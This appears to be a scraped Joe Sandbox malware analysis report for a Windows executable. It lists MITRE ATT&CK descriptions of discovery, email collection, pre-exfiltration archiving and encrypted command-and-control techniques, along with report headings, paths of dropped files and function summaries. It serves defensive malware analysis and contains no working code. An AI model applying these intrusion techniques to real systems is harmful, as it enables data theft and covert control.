Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4p5XLVXJnq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4p5XLVXJnq.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\-631756

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq0dfbrt.kko.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ot3dry14.mb0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd15ss1l.gvs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypvtc4cg.gy5.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
4p5XLVXJnq.exe

Function 0319D469 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
threadCOMMON

Function 0319D478 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0319B1E0 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Function 0319590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 0319449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 078303F8 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre